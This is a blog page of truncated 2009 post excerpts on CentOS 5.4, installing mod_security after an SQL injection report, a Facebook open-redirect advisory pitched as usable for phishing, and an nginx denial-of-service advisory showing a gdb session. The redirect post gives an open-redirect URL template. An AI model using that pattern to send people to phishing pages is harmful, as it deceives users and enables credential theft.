Posts

Showing posts from October 25, 2009

CentOS 5.4

The CentOS team is pleased to announce the availability of CentOS 5.4.

Major changes in CentOS 5 compared to CentOS 4 include:
These updated software versions: Apache-2.2, php-5.1.6, kernel-2.6.18, Gnome-2.16, KDE-3.5, OpenOffice.org-2.3, Evolution-2.12, Firefox-3.0, Thunderbird-2.0, MySQL-5.0, PostgreSQL-8.
Better desktop support with compiz and AIGLX.
Virtualization provided by the Xen hypervisor with Virtual Machine Manager and libvirt.

Major changes compared to earlier CentOS 5 versions include:
KVM as a preview for the new virtualization technology in Enterprise Linux.
ext4 as a technology preview in file systems.

Source: www.centos.org
Download from the local IX (Indonesia): http://mirror.unej.ac.id/centos/5.4/isos/i386/

SQL injection and mod_security - black and white

This noon we read a mail from someone, and he claims he found an SQL injection in our site. How can it be ... magic quotes is still off and mod_security is not yet installed. See this article from: http://www.cyberciti.biz/faq/rhel-fedora-centos-httpd-mod_security-configuration/

Red Hat / CentOS Install mod_security Apache Intrusion Detection And Prevention Engine
by Vivek Gite

How do I install ModSecurity - an open source intrusion detection and prevention engine for web applications under CentOS / RHEL / Red Hat Enterprise Linux 5.x server?

ModSecurity operates embedded into the web server (httpd), acting as a powerful umbrella - shielding web applications from attacks. In order to use mod_security, you need to turn on EPEL repo under CentOS / RHEL Linux. Once repo is turned on, type the following command to install ModSecurity:

# yum install mod_security

Sample output:

Loaded plugins: downloadonly, fastestmirror, priorities, protectbase
Loading mirror speeds from cached hostfile
* epel: www.

Redirect and Phishing Facebook

Tonight was very smooth; I just opened my eyes and read about security around the world. Facebook is the biggest social community, and people can make applications like games, quizzes, etc. Can we phish that? ... Of course ... have you read this: http://www.packetstormsecurity.com/0910-exploits/facebook-redir.txt

# [+] Facebook Redirection
#
# [+] Author : 599eme Man
# [+] Contact : Flouf@live.fr
#
#[------------------------------------------------------------------------------------]
#
# [+] How use ?
#
# http://apps.facebook.com/quizzname/?next=[Redirection]
#
# [+] PoC :
#
# http://apps.fa

check your nginx

http://www.packetstormsecurity.com/0910-exploits/nginx-dos.txt

debian:~# uname -a
Linux debian 2.6.18-6-686 #1 SMP Thu Aug 20 21:56:59 UTC 2009 i686 GNU/Linux
debian:~# cat /etc/issue
Debian GNU/Linux 4.0 \n \l
debian:~# dpkg -l|grep nginx
ii nginx 0.4.13-2+etch2 small, but very powerful and efficient
debian:~# ps xauwww|grep worker|grep -v grep
www-data 3577 0.0 0.9 2688 928 ? S 01:50 0:00 nginx: worker process
debian:~# gdb -p 3577
GNU gdb 6.4.90-debian
Copyright (C) 2006 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i486-linux-gnu".
Attaching to process 3577
Reading symbols from /usr/sbin/nginx...(no debugging symbols found)...done.
Using host libthread_db library "/l